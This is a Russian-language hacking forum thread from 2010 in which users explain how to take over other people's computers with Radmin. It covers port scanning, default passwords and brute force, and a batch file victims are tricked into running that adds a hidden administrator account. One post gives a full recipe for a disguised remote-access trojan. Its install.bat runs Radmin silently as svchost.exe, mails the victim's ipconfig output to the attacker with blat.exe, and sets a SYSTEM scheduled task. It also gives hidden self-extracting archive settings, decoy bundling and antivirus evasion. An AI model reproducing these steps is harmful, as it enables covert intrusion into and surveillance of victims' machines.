Реклама на hackersoft.ru Реклама на hackersoft.ru

Вернуться   Форумы Hackersoft > Хакерство и безопасность > Для новичков > Взлом компьютеров
CHAT Регистрация Справка Пользователи Доска почета Календарь Поиск Сообщения за день Все разделы прочитаны

Взлом компьютеров Проникновение на удаленные компьютеры и серверы. Получение доступа к чужой системе.

Ответ
 
Опции темы
Старый 02.06.2010, 11:23   #11
m33
professional 
 
Аватар для m33
 
Регистрация: 30.08.2008
Прописка: 127.0.0.1
Сообщений: 1,495
Вес репутации: 44 m33 профессионалm33 профессионалm33 профессионалm33 профессионалm33 профессионалm33 профессионалm33 профессионалm33 профессионалm33 профессионалm33 профессионал
Депозит: 0$
Вы сказали Спасибо: 109
Поблагодарили 609 раз(а) в 351 сообщениях
кстати, у кого не работает сканер - нужно заюзать half-open limit fix.
half-open limit fix предназначена для изменения максимального количества одновременных полуоткрытых исходящих TCP соединений (half-open connections или connection attempts) в системном файле tcpip.sys

Я няшка.
m33 вне форума   Ответить с цитированием
Благодарности m33 от:
Старый 03.06.2010, 22:46   #12
Damir
user 
 
Аватар для Damir
 
Регистрация: 04.01.2010
Сообщений: 63
Вес репутации: 2 Damir новичек
Депозит: 0$
Вы сказали Спасибо: 20
Поблагодарили 2 раз(а) в 2 сообщениях
Я на сканил много ипов, пробывал в радмине запускается ,но логин и пароль не реально узнать скажите?
Damir вне форума   Ответить с цитированием
Старый 03.06.2010, 23:43   #13
Ecooo
adherent 
 
Аватар для Ecooo
 
Регистрация: 27.10.2009
Сообщений: 166
Вес репутации: 4 Ecooo новичек
Депозит: 0$
Вы сказали Спасибо: 41
Поблагодарили 29 раз(а) в 19 сообщениях
Если выскакивает логин и пароль, то нет...если только пароль - то пробуй default "12345678"

Ecooo вне форума   Ответить с цитированием
Старый 04.06.2010, 12:27   #14
Damir
user 
 
Аватар для Damir
 
Регистрация: 04.01.2010
Сообщений: 63
Вес репутации: 2 Damir новичек
Депозит: 0$
Вы сказали Спасибо: 20
Поблагодарили 2 раз(а) в 2 сообщениях
А брута нет на radmin??На удаленный рабочий стол(Дедикатед сервер) есть же RDP brute
Damir вне форума   Ответить с цитированием
Старый 07.06.2010, 02:21   #15
grem
newbie 
 
Регистрация: 04.06.2010
Сообщений: 4
Вес репутации: 0 grem новичек
Депозит: 0$
Вы сказали Спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Я скачала Радмин, и знаю IP жертвы. Только программа никаких паролей не запрашивает, когда нажимаю соединение - чтото там пытается, потом говорит не удаётся подключиться к серверу! Как это можно исправить?
А ещё я не особо поняла с файлом bak. Просто надо чтоб жертва открыла его на своём компе? И всё? объясните пожалуста, что вобще делает этот файл...подоходчивее.
grem вне форума   Ответить с цитированием
Старый 07.06.2010, 08:44   #16
m33
professional 
 
Аватар для m33
 
Регистрация: 30.08.2008
Прописка: 127.0.0.1
Сообщений: 1,495
Вес репутации: 44 m33 профессионалm33 профессионалm33 профессионалm33 профессионалm33 профессионалm33 профессионалm33 профессионалm33 профессионалm33 профессионалm33 профессионал
Депозит: 0$
Вы сказали Спасибо: 109
Поблагодарили 609 раз(а) в 351 сообщениях
Цитата:
А брута нет на radmin??
есть.
у меня где то был.
погугли.
Цитата:
Я скачала Радмин, и знаю IP жертвы. Только программа никаких паролей не запрашивает, когда нажимаю соединение - чтото там пытается, потом говорит не удаётся подключиться к серверу
не все так просто.
на удаленном компе видимо не стоит радмин.
Цитата:
А ещё я не особо поняла с файлом bak. Просто надо чтоб жертва открыла его на своём компе? И всё? объясните пожалуста, что вобще делает этот файл...подоходчивее.
bat.
угу, надо чтобы жертва открыла на своем компе.
бтник создает новую учетную запись всо всеми правами и открывает 4899 порт.
З.Ы здесь нельзя задавать вопросы вообщето.

Я няшка.
m33 вне форума   Ответить с цитированием
Благодарности m33 от:
Старый 07.06.2010, 13:30   #17
Freeone3
newbie 
 
Аватар для Freeone3
 
Регистрация: 04.06.2010
Сообщений: 5
Вес репутации: 0 Freeone3 новичек
Депозит: 0$
Вы сказали Спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Цитата:
Сообщение от grem Посмотреть сообщение
Я скачала Радмин, и знаю IP жертвы. Только программа никаких паролей не запрашивает, когда нажимаю соединение - чтото там пытается, потом говорит не удаётся подключиться к серверу! Как это можно исправить?
А ещё я не особо поняла с файлом bak. Просто надо чтоб жертва открыла его на своём компе? И всё? объясните пожалуста, что вобще делает этот файл...подоходчивее.

Сначала ж нужно узнать у кого из пользователей твоей сети открыт 4899 порт, а потом только уже подключатся. Сканеры прогугли там их много, даже в начала вылаживали не плохой сканер.
Когда ты залил бантик на чужой комп, он создаёт нового пользователя с админскими правами и твоим пассом, как бы другой пользователь зайти на твоего пользователя не сможет. Бантик открывает еще 4899 порт, который нам и нужен для проникновения на чужой комп. Если всё готово бери и подключайся.
Freeone3 вне форума   Ответить с цитированием
Старый 08.06.2010, 10:29   #18
SoftHack
☣ 
 
Аватар для SoftHack
 
Регистрация: 07.07.2009
Прописка: Real Life
Сообщений: 610
Вес репутации: 16 SoftHack продвинутыйSoftHack продвинутыйSoftHack продвинутыйSoftHack продвинутый
Депозит: 0$
Вы сказали Спасибо: 290
Поблагодарили 262 раз(а) в 176 сообщениях
В продолжение темы...


Так же можно заюзать старый-добрый радмин взятый с античата Ⓒ

Настройка:
  1. Распаковываем архив,

    Открываем блокнотиком файл "install.bat"
    Ищем строчки:
    Код:
    "%SYSTEMROOT%/svchost.exe" /silence /pass:ваш_пароль /port:ваш_порт(по умолчанию 4899) /save
    "%SYSTEMROOT%/svchost.exe" /start
    
    %SYSTEMROOT%/system32/rm/blat.exe -install -server smtp.почтовый_сервер.ru -port 587 -f мыло@почтовый_сервер.ru -u ваш_логин -pw ваш_пароль
    
    ipconfig /all > %systemroot%/system32/rm/ip.txt
    
    blat.exe %systemroot%/system32/rm/ip.txt -to мыло@почтовый_сервер.ru.
    правим комментарии на свой почтовый ящик (на него придёт IP жертвы), порт, пароль и т.д.

    Эта строчка:
    Код:
    schtasks /create /tn "security" /sc minute /mo 3600 /ru "NT AUTHORITY\SYSTEM" /tr %SYSTEMROOT%/system32/rm\ip.bat
    Отвечает за отправки IP на мыло через определённое время (по умолчанию через 60 минут)
    Сохраняем.

    ======================
  2. Теперь открываем файл "ip.bat"
    Код:
    %SYSTEMROOT%/system32/rm/blat.exe -install -server smtp.почтовый_сервер.ru -port 587 -f логин@почтовый_сервер.ru -u тут_логин -pw тут_пароль
    
    blat.exe %systemroot%/system32/rm/ip.txt -to логин@почтовый_сервер.ru.
    Так же правим под себя и сохраняем.

    =======================
  3. Далее архивируем WinRar'ом с параметрами:
    Вкладка Общие => Параметры архивации => Создать SFX-архив (ставим галочку)
    Вкладка Дополнительно => Параметры SFX => Общие => Путь для распаковки => Например C:\
    =>Программа установки => Выполнить после распаковки => install.bat
    =>Режимы => Режим вывода информации => Скрыть всё
    =>Обновление => Режим перезаписи => Переписывать все файлы без запроса
    Так же на вкладке Текст и графика можно выбрать свою иконку.

    Отправляем файл другу

    =======================

    Extra
    • Для маскировки можно в архив вложить настоящую програмку, поставить её значок и прописать её запуск в install.bat
    • Можно склеить джоинером
    • Так же почитайте эту тему.
=======================
Зарегал мыло для теста радмина (пароль токо не меняйте)
Скрытый текст (вы должны войти под своим логином или зарегистрироваться и иметь 100 сообщение(ий)):
У вас нет прав чтобы видеть скрытый текст, содержащейся здесь.

Радмин прилагается (порт для коннекта: 4389)

SoftHack

HackersOfTrue! Хакеры правды! (C) Kanaris

Последний раз редактировалось SoftHack, 21.06.2011 в 22:59.
SoftHack вне форума   Ответить с цитированием
Старый 11.06.2010, 04:41   #19
KOT22191
advanced 
 
Аватар для KOT22191
 
Регистрация: 10.05.2010
Сообщений: 254
Вес репутации: 6 KOT22191 новичек
Депозит: 0$
Вы сказали Спасибо: 143
Поблагодарили 74 раз(а) в 51 сообщениях
Кстати сайт теперь здесь http://redsh.tk/
Но ссылки на народе работают)

добавлено через 3 часа 23 минуты
Цитата:
Так же можно заюзать старый-добрый радмин взятый с античата Ⓒ
Ip на мыло че то не отправился

Последний раз редактировалось KOT22191, 11.06.2010 в 08:05. Причина: Добавлено сообщение
KOT22191 вне форума   Ответить с цитированием
Старый 11.06.2010, 14:45   #20
KOT22191
advanced 
 
Аватар для KOT22191
 
Регистрация: 10.05.2010
Сообщений: 254
Вес репутации: 6 KOT22191 новичек
Депозит: 0$
Вы сказали Спасибо: 143
Поблагодарили 74 раз(а) в 51 сообщениях
Цитата:
Малость напутал со временем
Здесь период отправки ip 60 секунд
а я туда 3 "минуты" вписал и проверял на виртуалке
фаервол отключал и каспер на всякий тоже.
после паковки в sfx KISa палит эвристикой exe-шник
KOT22191 вне форума   Ответить с цитированием
Ответ


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 
Опции темы

Ваши права в разделе
Вы не можете создавать темы
Вы не можете отвечать на сообщения
Вы не можете прикреплять файлы
Вы не можете редактировать сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.


Часовой пояс GMT +4, время: 04:09.


© 2005 — +∞ Hackersoft. Все и вся защищены.
Публичная оферта | Правила форума | Реклама на сайте
Powered by vBulletin®©™ Jelsoft®©™ Enterprises Ltd. Перевод: zCarot.
Реклама на hackersoft.ru Реклама на hackersoft.ru